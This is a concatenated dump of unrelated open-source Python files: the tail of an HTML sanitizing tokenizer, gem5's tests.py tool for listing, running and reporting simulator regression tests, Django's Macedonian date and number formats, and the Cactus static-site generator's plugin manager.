# Change case matching defaults as we only output lowercase html anyway
# This solution doesn't seem ideal...
HTMLTokenizer.__init__(self, stream, encoding, parseMeta, useChardet,
lowercaseElementName, lowercaseAttrName, parser=parser)
def __iter__(self):
for token in HTMLTokenizer.__iter__(self):
token = self.sanitize_token(token)
if token:
yield token
| gpl-3.0 |
BellScurry/gem5-fault-injection | tests/tests.py | 10 | 12420 | #!/usr/bin/env python
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
import argparse
import sys
import os
import pickle
from testing.tests import *
import testing.results
class ParagraphHelpFormatter(argparse.HelpFormatter):
def _fill_text(self, text, width, indent):
return "\n\n".join([
super(ParagraphHelpFormatter, self)._fill_text(p, width, indent) \
for p in text.split("\n\n") ])
formatters = {
"junit" : testing.results.JUnit,
"text" : testing.results.Text,
"summary" : testing.results.TextSummary,
"pickle" : testing.results.Pickle,
}
def _add_format_args(parser):
parser.add_argument("--format", choices=formatters, default="text",
help="Output format")
parser.add_argument("--no-junit-xlate-names", action="store_true",
help="Don't translate test names to " \
"package-like names")
parser.add_argument("--output", "-o",
type=argparse.FileType('w'), default=sys.stdout,
help="Test result output file")
def _create_formatter(args):
formatter = formatters[args.format]
kwargs = {
"fout" : args.output,
"verbose" : args.verbose
}
if issubclass(formatter, testing.results.JUnit):
kwargs.update({
"translate_names" : not args.no_junit_xlate_names,
})
return formatter(**kwargs)
def _list_tests_args(subparsers):
parser = subparsers.add_parser(
"list",
formatter_class=ParagraphHelpFormatter,
help="List available tests",
description="List available tests",
epilog="""
Generate a list of available tests using a list filter.
The filter is a string consisting of the target ISA optionally
followed by the test category and mode separated by
slashes. The test names emitted by this command can be fed
into the run command.
For example, to list all quick arm tests, run the following:
tests.py list arm/quick
Non-mandatory parts of the filter string (anything other than
the ISA) can be left out or replaced with the wildcard
character. For example, all full-system tests can be listed
with this command: tests.py list arm/*/fs""")
parser.add_argument("--ruby-protocol", type=str, default=None,
help="Ruby protocol")
parser.add_argument("--gpu-isa", type=str, default=None,
help="GPU ISA")
parser.add_argument("list_filter", metavar="ISA[/category/mode]",
action="append", type=str,
help="List available test cases")
def _list_tests(args):
for isa, categories, modes in \
( parse_test_filter(f) for f in args.list_filter ):
for test in get_tests(isa, categories=categories, modes=modes,
ruby_protocol=args.ruby_protocol,
gpu_isa=args.gpu_isa):
print "/".join(test)
sys.exit(0)
def _run_tests_args(subparsers):
parser = subparsers.add_parser(
"run",
formatter_class=ParagraphHelpFormatter,
help='Run one or more tests',
description="Run one or more tests.",
epilog="""
Run one or more tests described by a gem5 test tuple.
The test tuple consists of a test category (quick or long), a
test mode (fs or se), a workload name, an isa, an operating
system, and a config name separate by slashes. For example:
quick/se/00.hello/arm/linux/simple-timing
Available tests can be listed using the 'list' sub-command
(e.g., "tests.py list arm/quick" or one of the scons test list
targets (e.g., "scons build/ARM/tests/opt/quick.list").
The test results can be stored in multiple different output
formats. See the help for the show command for more details
about output formatting.""")
parser.add_argument("gem5", type=str,
help="gem5 binary")
parser.add_argument("test", type=str, nargs="*",
help="List of tests to execute")
parser.add_argument("--directory", "-d",
type=str, default="m5tests",
help="Test work directory")
parser.add_argument("--timeout", "-t",
type=int, default="0", metavar="MINUTES",
help="Timeout, 0 to disable")
parser.add_argument("--skip-diff-out", action="store_true",
help="Skip output diffing stage")
parser.add_argument("--skip-diff-stat", action="store_true",
help="Skip stat diffing stage")
_add_format_args(parser)
def _run_tests(args):
formatter = _create_formatter(args)
out_base = os.path.abspath(args.directory)
if not os.path.exists(out_base):
os.mkdir(out_base)
tests = []
for test_name in args.test:
config = ClassicConfig(*test_name.split("/"))
out_dir = os.path.join(out_base, "/".join(config))
tests.append(
ClassicTest(args.gem5, out_dir, config,
timeout=args.timeout,
skip_diff_stat=args.skip_diff_stat,
skip_diff_out=args.skip_diff_out))
all_results = []
print "Running %i tests" % len(tests)
for testno, test in enumerate(tests):
print "%i: Running '%s'..." % (testno, test)
all_results.append(test.run())
formatter.dump_suites(all_results)
def _show_args(subparsers):
parser = subparsers.add_parser(
"show",
formatter_class=ParagraphHelpFormatter,
help='Display pickled test results',
description='Display pickled test results',
epilog="""
Reformat the pickled output from one or more test runs. This
command is typically used with the output from a single test
run, but it can also be used to merge the outputs from
multiple runs.
The 'text' format is a verbose output format that provides
information about individual test units and the output from
failed tests. It's mainly useful for debugging test failures.
The 'summary' format provides outputs the results of one test
per line with the test's overall status (OK, SKIPPED, or
FAILED).
The 'junit' format is primarily intended for use with CI
systems. It provides an XML representation of test
status. Similar to the text format, it includes detailed
information about test failures. Since many JUnit parser make
assume that test names look like Java packet strings, the
JUnit formatter automatically to something the looks like a
Java class path ('.'->'-', '/'->'.').
The 'pickle' format stores the raw results in a format that
can be reformatted using this command. It's typically used
with the show command to merge multiple test results into one
pickle file.""")
_add_format_args(parser)
parser.add_argument("result", type=argparse.FileType("rb"), nargs="*",
help="Pickled test results")
def _show(args):
formatter = _create_formatter(args)
suites = sum([ pickle.load(f) for f in args.result ], [])
formatter.dump_suites(suites)
def _test_args(subparsers):
parser = subparsers.add_parser(
"test",
formatter_class=ParagraphHelpFormatter,
help='Probe test results and set exit code',
epilog="""
Load one or more pickled test file and return an exit code
corresponding to the test outcome. The following exit codes
can be returned:
0: All tests were successful or skipped.
1: General fault in the script such as incorrect parameters or
failing to parse a pickle file.
2: At least one test failed to run. This is what the summary
formatter usually shows as a 'FAILED'.
3: All tests ran correctly, but at least one failed to
verify its output. When displaying test output using the
summary formatter, such a test would show up as 'CHANGED'.
""")
_add_format_args(parser)
parser.add_argument("result", type=argparse.FileType("rb"), nargs="*",
help="Pickled test results")
def _test(args):
suites = sum([ pickle.load(f) for f in args.result ], [])
if all(s for s in suites):
sys.exit(0)
elif any([ s.failed_run() for s in suites ]):
sys.exit(2)
elif any([ s.changed() for s in suites ]):
sys.exit(3)
else:
assert False, "Unexpected return status from test"
_commands = {
"list" : (_list_tests, _list_tests_args),
"run" : (_run_tests, _run_tests_args),
"show" : (_show, _show_args),
"test" : (_test, _test_args),
}
def main():
parser = argparse.ArgumentParser(
formatter_class=ParagraphHelpFormatter,
description="""gem5 testing multi tool.""",
epilog="""
This tool provides an interface to gem5's test framework that
doesn't depend on gem5's build system. It supports test
listing, running, and output formatting.
The list sub-command (e.g., "test.py list arm/quick") produces
a list of tests tuples that can be used by the run command
(e.g., "tests.py run gem5.opt
quick/se/00.hello/arm/linux/simple-timing").
The run command supports several output formats. One of them,
pickle, contains the raw output from the tests and can be
re-formatted using the show command (e.g., "tests.py show
--format summary *.pickle"). Such pickle files are also
generated by the build system when scons is used to run
regressions.
See the usage strings for the individual sub-commands for
details.""")
parser.add_argument("--verbose", action="store_true",
help="Produce more verbose output")
subparsers = parser.add_subparsers(dest="command")
for key, (impl, cmd_parser) in _commands.items():
cmd_parser(subparsers)
args = parser.parse_args()
impl, cmd_parser = _commands[args.command]
impl(args)
if __name__ == "__main__":
main()
| bsd-3-clause |
ticosax/django | django/conf/locale/mk/formats.py | 504 | 1742 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'd F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'j.m.Y'
SHORT_DATETIME_FORMAT = 'j.m.Y H:i'
FIRST_DAY_OF_WEEK = 1
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d.%m.%Y', '%d.%m.%y', # '25.10.2006', '25.10.06'
'%d. %m. %Y', '%d. %m. %y', # '25. 10. 2006', '25. 10. 06'
]
DATETIME_INPUT_FORMATS = [
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M:%S.%f', # '25.10.06 14:30:59.000200'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
'%d. %m. %Y %H:%M:%S', # '25. 10. 2006 14:30:59'
'%d. %m. %Y %H:%M:%S.%f', # '25. 10. 2006 14:30:59.000200'
'%d. %m. %Y %H:%M', # '25. 10. 2006 14:30'
'%d. %m. %Y', # '25. 10. 2006'
'%d. %m. %y %H:%M:%S', # '25. 10. 06 14:30:59'
'%d. %m. %y %H:%M:%S.%f', # '25. 10. 06 14:30:59.000200'
'%d. %m. %y %H:%M', # '25. 10. 06 14:30'
'%d. %m. %y', # '25. 10. 06'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '.'
NUMBER_GROUPING = 3
| bsd-3-clause |
eudicots/Cactus | cactus/plugin/manager.py | 5 | 2122 | #coding:utf-8
import functools
from cactus.utils.internal import getargspec
from cactus.plugin import defaults
class PluginManager(object):
def __init__(self, site, loaders):
self.site = site
self.loaders = loaders
self.reload()
for plugin_method in defaults.DEFAULTS:
if not hasattr(self, plugin_method):
setattr(self, plugin_method, functools.partial(self.call, plugin_method))
def reload(self):
plugins = []
for loader in self.loaders:
plugins.extend(loader.load())
self.plugins = sorted(plugins, key=lambda plugin: plugin.ORDER)
def call(self, method, *args, **kwargs):
"""
Call each plugin
"""
for plugin in self.plugins:
_meth = getattr(plugin, method)
_meth(*args, **kwargs)
def preBuildPage(self, site, page, context, data):
"""
Special call as we have changed the API for this.
We have two calling conventions:
- The new one, which passes page, context, data
- The deprecated one, which also passes the site (Now accessible via the page)
"""
for plugin in self.plugins:
# Find the correct calling convention
new = [page, context, data]
deprecated = [site, page, context, data]
arg_lists = dict((len(l), l) for l in [deprecated, new])
try:
# Try to find the best calling convention
n_args = len(getargspec(plugin.preBuildPage).args)
# Just use the new calling convention if there's fancy usage of
# *args, **kwargs that we can't control.
arg_list = arg_lists.get(n_args, new)
except NotImplementedError:
# If we can't get the number of args, use the new one.
arg_list = new
# Call with the best calling convention we have.
# If that doesn't work, then we'll let the error escalate.
context, data = plugin.preBuildPage(*arg_list)
return context, data
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.